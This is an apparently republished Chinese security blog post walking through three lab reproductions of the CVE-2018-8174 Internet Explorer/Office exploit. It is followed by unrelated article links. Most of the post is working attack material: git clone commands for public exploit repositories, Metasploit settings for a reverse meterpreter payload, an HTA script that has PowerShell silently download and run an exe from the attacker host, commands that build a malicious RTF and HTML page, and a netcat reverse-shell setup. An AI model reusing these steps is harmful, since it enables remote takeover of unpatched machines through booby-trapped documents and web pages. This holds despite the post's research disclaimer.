用不同姿势复现 CVE-2018-8174 漏洞

本文作者:\xeb\xfe(信安之路作者团队成员)

日前,360 核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用 0day 漏洞的 APT 攻击,捕获到了全球首例利用浏览器 0day 漏洞的新型 Office 文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。

实验一:metasploit 复现

下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录

cp CVE-2018-8174.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
setPAYLOAD windows/meterpreter/reverse_tcp
setsrvhost 192.168.188.141
setlhost 192.168.188.141
exploit

注: 实验失败,攻击过程中看到的确发起了攻击,但是没有会话返回,freebuf 发布的文章中,也只是session -l,并没有真正的会话返回。

实验二: 利用 mshta 从远程服务器下载文件并执行。

POC 附件:https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密码:ci8h

1.构造 hta 文件,通过 ActiveXObject 调用 WScript.shell,执行 powershell 命令,实现下载文件并执行。

<script>
a=newActiveXObject("WScript.Shell");
a.run('powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://192.168.188.141/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

我使用的攻击机是 kali2018.2,启动 apache2 服务,将该文件 test.hta 上传到默认网站路径 /var/www/html/,得到地址:

http://192.168.188.141/test.hta

使用 msfvenom 生成反弹 shell exe 。

2.使用 `msfvenom` 生成 js Shellcode

把生成的 Shellcode 字符替换至 8174poc.html 166 行代码

3.生成 Word 文档。

下载 python 脚本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://192.168.188.141/8174poc.html -o exp.rtf

4.开启 msf 监听。

得到目录中的 “exp.rtf ”文件,使用 Word 文档打开即可下载执行 xxx.exe 文件,或者 IE 浏览器打开

http://192.168.188.141/8174poc.html

即可下载执行 xxx.exe 文件

注: 实验失败,攻击发动了,但是没有获取到反弹 shell。(其他朋友用 MSF 复现也遇到同样的情况。)

实验三:利用 NC 监听获取 msf session.

下载 python 脚本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

本地启动 apache 服务,运行 CVE-2018-8174.py 生成攻击 RTF(exp.rtf)和攻击 HTML(exploit.html)。

python CVE-2018-8174.py -u http://192.168.188.141/exploit.html -o exp.rtf -i 192.168.188.141 -p 4444`

将攻击 RTF(exp.rtf)和攻击 HTML( exploit.html) 复制到 apache 网站根目录,

攻击机开启本地NC监听,

在被攻击机 (192.168.188.140) 上用 IE 浏览器打开链接

http://192.168.188.141/exploit.html

这里会自动跳转一下,然后在攻击机上可以看到反弹回来的 shell 了。

到这里已经成功获取到 shell。

实验中遇到的坑

1、NC 测试成功,尝试 msf handler 监听,出现错误。

获取到会话,直接 died 了。

2、使用 IE32 位浏览器,成功获取到会话,尝试 IE64 位浏览器出现错误。

访问网页,无任何反应。

3、使用 64 位 office 打开 RTF 文件,无任何反应。

总结

经多次实验,发现目前支持的版本是 32 位 IE 浏览器和 32 位 office。网页访问上线的,就算把浏览器关闭了,shell 依然是存活状态。微软已发布官方补丁,对该 0day 漏洞进行了修复。APT 攻击防不胜防,在平时尽量不要点开来历不明的 offce 文档或者链接,及时更新系统补丁。

本文章的内容只限技术研究,用于非法攻击产生风险自担。

参考链接:

CVE-2018-8174 “双杀”0day漏洞复现

http://www.freebuf.com/vuls/173727.html

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2018-06-21

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏编程微刊

如何在小程序里面放入企业官网注意:

20320
来自专栏沈唁志

整合ThinkPHP功能系列之微信公众号支付

33550
来自专栏hotqin888的专栏

局域网linux系统CentOS上部署engineercms、docker和onlyoffice实现文档协作

等了好久,这次终于下决心在局域网部署了linux系统,并安装docker和load了onlyoffice,利用engineercms进行资料管理和文档协作。

25530
来自专栏葡萄城控件技术团队

HTML5 & CSS3初学者指南(3) – HTML5新特性

介绍 本文介绍了 HTML5 的一些新特性。主要包含以下几个方面: Web 存储 地理位置 拖放 服务器发送事件 Web存储 HTML5...

26380
来自专栏小白课代表

Autodesk 3DS MAX 2018安装教程

3D Studio Max,常简称为3d Max或3dsMAX,是Discreet公司开发的(后被Autodesk公司合并)基于PC系统的三维动画渲染和制作软件...

18630
来自专栏FreeBuf

护卫神主机大师提权漏洞利用分析

护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设...

29800
来自专栏魏艾斯博客www.vpsss.net

解决 Memcached telnet:connect to address 127.0.0.1:Connection refused

有一次魏艾斯博客重启了一下服务器,然后就发现打开网站速度没有之前快了,按照MemcacheD 缓存是否启用成功及命中率检查的办法建立了 phpinfo 文件,检...

90010
来自专栏小白课代表

软件分享 | 3DS MAX 2017安装教程

3D Studio Max,常简称为3d Max或3dsMAX,是Discreet公司开发的(后被Autodesk公司合并)基于PC系统的三维动画渲染和制作软件...

15430
来自专栏武军超python专栏

2018年8月9号飞机大战项目答辩得到的经验和基本的win终端命令

今天遇到的新单词: adapter n适配器 virtual adj 虚拟的 interface n接口 corporation n公司,法人

12230
来自专栏linux驱动个人学习

Android分区

实现手机必需的通信功能,大家通常所的刷RADIO就是刷写modem分区,在所有适配的ROM中这部分是不动,否则会造成通话不稳定

16120

扫码关注云+社区

领取腾讯云代金券